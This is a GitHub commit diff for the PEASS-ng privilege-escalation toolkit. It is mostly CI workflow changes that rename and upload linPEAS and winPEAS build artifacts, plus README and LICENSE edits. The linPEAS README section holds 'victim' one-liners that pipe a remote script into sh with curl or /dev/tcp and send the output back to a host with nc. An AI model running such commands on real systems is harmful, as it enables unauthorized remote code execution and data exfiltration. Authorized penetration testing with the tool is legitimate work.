Skip to content

Commit d63d1ef

Browse files
authored
Merge e1b1421 into 24b6713
2 parents 24b6713 + e1b1421 commit d63d1ef

File tree

23 files changed

+400
-4689
lines changed

23 files changed

+400
-4689
lines changed

.github/workflows/CI-master_tests.yml

Lines changed: 23 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -124,6 +124,12 @@ jobs:
124124
with:
125125
name: winPEASany_ofs.exe
126126
path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASany.exe
127+
128+
- name: Upload winpeas.bat
129+
uses: actions/upload-artifact@v2
130+
with:
131+
name: winPEAS.bat
132+
path: winPEAS\winPEASbat\winPEAS.bat
127133

128134
# Git add
129135
#- name: Create local changes
@@ -176,6 +182,12 @@ jobs:
176182
git clone https://github.com/carlospolop/sh2bin
177183
cd sh2bin
178184
bash build.sh ../linPEAS/linpeas.sh
185+
mv builds/sh2bin_linux_386 builds/linpeas_linux_386
186+
mv builds/sh2bin_linux_amd64 builds/linpeas_linux_amd64
187+
mv builds/sh2bin_linux_arm builds/linpeas_linux_arm
188+
mv builds/sh2bin_linux_arm64 builds/linpeas_linux_arm64
189+
mv builds/sh2bin_darwin_amd64 builds/linpeas_darwin_amd64
190+
mv builds/sh2bin_darwin_arm64 builds/linpeas_darwin_arm64
179191
ls -lR ./
180192
181193
# Run linpeas help as quick test
@@ -198,38 +210,38 @@ jobs:
198210
uses: actions/upload-artifact@v2
199211
with:
200212
name: linpeas_linux_386
201-
path: sh2bin/builds/sh2bin_linux_386
213+
path: sh2bin/builds/linpeas_linux_386
202214

203215
- name: Upload linpeas_linux_amd64
204216
uses: actions/upload-artifact@v2
205217
with:
206218
name: linpeas_linux_amd64
207-
path: sh2bin/builds/sh2bin_linux_amd64
219+
path: sh2bin/builds/linpeas_linux_amd64
208220

209221
- name: Upload linpeas_linux_arm
210222
uses: actions/upload-artifact@v2
211223
with:
212224
name: linpeas_linux_arm
213-
path: sh2bin/builds/sh2bin_linux_arm
225+
path: sh2bin/builds/linpeas_linux_arm
214226

215227
- name: Upload linpeas_linux_arm64
216228
uses: actions/upload-artifact@v2
217229
with:
218230
name: linpeas_linux_arm64
219-
path: sh2bin/builds/sh2bin_linux_arm64
231+
path: sh2bin/builds/linpeas_linux_arm64
220232

221233
## Darwin bins
222234
- name: Upload linpeas_darwin_amd64
223235
uses: actions/upload-artifact@v2
224236
with:
225237
name: linpeas_darwin_amd64
226-
path: sh2bin/builds/sh2bin_darwin_amd64
238+
path: sh2bin/builds/linpeas_darwin_amd64
227239

228240
- name: Upload linpeas_darwin_arm64
229241
uses: actions/upload-artifact@v2
230242
with:
231243
name: linpeas_darwin_arm64
232-
path: sh2bin/builds/sh2bin_darwin_arm64
244+
path: sh2bin/builds/linpeas_darwin_arm64
233245

234246
# Clean sh2bin repo
235247
- name: Cleaning sh2bin
@@ -309,6 +321,11 @@ jobs:
309321
uses: actions/download-artifact@v2
310322
with:
311323
name: winPEASany_ofs.exe
324+
325+
- name: Download winpeas.bat
326+
uses: actions/download-artifact@v2
327+
with:
328+
name: winPEAS.bat
312329

313330
- name: Download linpeas.sh
314331
uses: actions/download-artifact@v2

.gitignore

Lines changed: 5 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -2,6 +2,7 @@
22
winPEAS/winPEASexe/.vs/*
33
v16/*
44
winPEAS/winPEASexe/.vs/winPEAS/v16/*
5+
winPEAS/winPEASexe/binaries/**/*.exe
56
Debug/*
67
winPEAS/winPEASexe/winPEAS/bin/Debug/*
78
.DS_Store
@@ -21,4 +22,7 @@ __pycache__
2122
*/__pycache__
2223
**/__pycache__
2324
linPEAS/builder/__pycache__/*
24-
linPEAS/builder/src/__pycache__/*
25+
linPEAS/builder/src/__pycache__/*
26+
linPEAS/linpeas.sh
27+
sh2bin
28+
sh2bin/*

LICENSE

Lines changed: 347 additions & 21 deletions
Large diffs are not rendered by default.

README.md

Lines changed: 4 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -18,21 +18,20 @@ These tools search for possible **local privilege escalation paths** that you co
1818
- Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks.xyz](https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist)**
1919
- **[LinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) - Linux local Privilege Escalation Awesome Script (.sh)**
2020

21+
## Quick Start
22+
Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/tag/refs%2Fheads%2Fmaster)**.
23+
2124
## Let's improve PEASS together
2225

2326
If you want to **add something** and have **any cool idea** related to this project, please let me know it in the **telegram group https://t.me/peass** or contribute reading the **[CONTRIBUTING.md](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/CONTRIBUTING.md)** file.
2427

25-
## Please, if this tool has been useful for you consider to donate
26-
27-
[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.patreon.com/peass)
28-
2928
## PEASS Style
3029

3130
Are you a PEASS fan? Get now our merch at **[PEASS Shop](https://teespring.com/stores/peass)** and show your love for our favorite peas
3231

3332
## Advisory
3433

35-
All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
34+
All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own machines and/or with the owner's permission.
3635

3736

3837
## License

linPEAS/README.md

Lines changed: 15 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -13,31 +13,40 @@ Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks
1313
Just execute `linpeas.sh` in a MacOS system and the **MacPEAS version will be automatically executed**
1414

1515
## Quick Start
16+
Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/tag/refs%2Fheads%2Fmaster)**.
17+
1618
```bash
17-
#From github
18-
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh
19+
# From github
20+
curl -L https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fheads%2Fmaster/linpeas.sh | sh
1921
```
2022

2123
```bash
22-
#Local network
24+
# Local network
2325
sudo python -m SimpleHTTPServer 80 #Host
2426
curl 10.10.10.10/linpeas.sh | sh #Victim
2527

26-
#Without curl
28+
# Without curl
2729
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
2830
cat < /dev/tcp/10.10.10.10/80 | sh #Victim
2931

30-
#Excute from memory and send output back to the host
32+
# Excute from memory and send output back to the host
3133
nc -lvnp 9002 | tee linpeas.out #Host
3234
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
3335
```
3436

3537
```bash
36-
#Output to file
38+
# Output to file
3739
./linpeas.sh -a > /dev/shm/linpeas.txt #Victim
3840
less -r /dev/shm/linpeas.txt #Read with colors
3941
```
4042

43+
```bash
44+
# Use a linpeas binary
45+
wget https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fheads%2Fmaster/linpeas_linux_amd64
46+
chmod +x linpeas_linux_amd64
47+
./linpeas_linux_amd64
48+
```
49+
4150
## AV bypass
4251
```bash
4352
#open-ssl encryption

0 commit comments

Comments
 (0)